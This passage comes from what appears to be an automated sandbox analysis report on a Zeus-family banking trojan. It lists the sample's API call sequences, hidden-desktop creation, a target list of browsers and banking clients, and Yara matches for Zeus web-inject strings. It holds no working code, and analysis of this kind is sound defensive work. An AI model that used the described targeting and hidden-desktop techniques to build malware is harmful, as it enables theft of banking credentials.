etHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe31_2_01121900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_013078A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_013078A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_013078A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe33_2_01301900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,22_2_012E95B0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2.3.svchost.exe.2700000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.Z8eHwAvqAh.exe.6184c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
